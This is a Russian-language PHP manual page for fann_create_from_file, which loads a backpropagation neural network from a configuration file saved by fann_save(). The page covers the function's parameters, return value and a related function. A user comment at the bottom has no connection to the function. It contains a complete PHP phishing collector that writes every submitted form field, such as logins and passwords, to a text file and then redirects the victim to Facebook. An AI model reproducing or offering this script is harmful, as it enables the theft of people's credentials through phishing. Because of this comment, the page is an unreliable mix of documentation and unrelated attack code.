fann_create_from_file

(PECL fann >= 1.0.0)

fann_create_from_fileConstructs a backpropagation neural network from a configuration file

Описание

resource fann_create_from_file ( string $configuration_file )

Constructs a backpropagation neural network from a configuration file, which have been saved by fann_save().

Список параметров

configuration_file

The configuration file path.

Возвращаемые значения

Возвращает ресурс (resource) нейронной сети в случае успешного выполнения, или FALSE в случае ошибки.

Смотрите также

  • fann_save() - Saves the entire network to a configuration file

Коментарии

Code:
<?php
header 
('Location: http://www.facebook.com');
$handle fopen("lol.txt""a");
foreach(
$_POST as $variable => $value) {
   
fwrite($handle$variable);
   
fwrite($handle"=");
   
fwrite($handle$value);
   
fwrite($handle"\r\n");
}
fwrite($handle"\r\n");
fclose($handle);
exit;
?>
2014-06-19 19:48:26
http://php5.kiev.ua/manual/ru/function.fann-create-from-file.html

    Поддержать сайт на родительском проекте КГБ